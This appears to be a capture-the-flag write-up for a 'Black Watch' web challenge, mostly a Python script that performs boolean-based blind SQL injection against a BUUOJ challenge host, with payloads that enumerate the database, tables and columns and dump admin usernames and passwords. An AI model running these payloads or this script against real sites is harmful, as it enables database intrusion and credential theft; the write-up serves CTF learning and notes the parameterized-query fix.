# [Black Watch 入群题] Web
# ![1]()
发现存在 SQL 注入，属于布尔盲注（JSON 响应需先解码再判断）：
import requests
# Boolean-based blind SQL injection probe from a CTF writeup (original
# indentation was lost in the paste; restored here). The target's `id`
# parameter reaches the query unparameterized, so a comparison wrapped as
# `1^(cond)^1` (`^` is bitwise XOR in MySQL) turns the id expression into the
# truth value of `cond`, and the difference in the returned JSON row leaks one
# bit per request. The fix on the application side is a parameterized query
# (or casting `id` to an integer before use); the script only documents the probe.
flag: str = ''
# Step 1: enumerate the database name (result: news)
payload1 = '1^(ascii(substr((select(database())),{},1))>{})^1' # database name is news
# Step 2: enumerate table names (result: admin,contents)
payload2 = '1^(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema=\'news\')),{},1))>{})^1' # table names are admin,contents
# Step 3: enumerate column names
payload3 = '1^(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name=\'contents\')),{},1))>{})^1' # admin table has id,username,password,is_enable
# contents table has id,title,content,is_enable
# Step 4: dump column values (the loop below is shown with payload4)
payload4 = '1^(ascii(substr((select(group_concat(username))from(admin)),{},1))>{})^1' # run once for username and once for password
# Each outer iteration recovers one character: `i` is the 1-based substr
# offset into the selected value; at most 99 positions are probed.
for i in range(1, 100):
    # Binary search over the ASCII range [28, 137) for this character;
    # `mid` is the threshold sent in the `>` comparison of the payload.
    low = 28
    high = 137
    mid = (low + high) // 2
    while (low < high):
        url = 'http://8925938b-be36-44ef-a411-70363c14ef36.node5.buuoj.cn:81/backend/content_detail.php?id='
        payload = payload4.format(i, mid)
        url += payload
        print(url)  # echoes every probe URL; noisy, but shows the request count
        r = requests.get(url)
        text = str(r.json())  # the JSON body is decoded before the marker check
        # Oracle: the marker text belongs to the id=1 row, so it is present
        # exactly when the comparison is true (ascii(char) > mid) and the
        # XOR expression evaluates to 1 — narrow the range upward in that case.
        if "札师傅缺个女朋友" in text:
            low = mid + 1
        else:
            high = mid
        mid = (low + high) // 2
    # NOTE(review): chr() never returns '', so this guard can never fire and
    # the outer loop always runs through all 99 positions; once the value is
    # exhausted, substr() yields '' and the search converges to `low`.
    if (chr(mid) == ''):
        break
    flag += chr(mid)
    print(flag)  # progress: value recovered so far
print(flag)
# This code relies on the id=1 case and uses binary search to reduce the number of requests
参考链接:https://blog.csdn.net/qq_46263951/article/details/119059485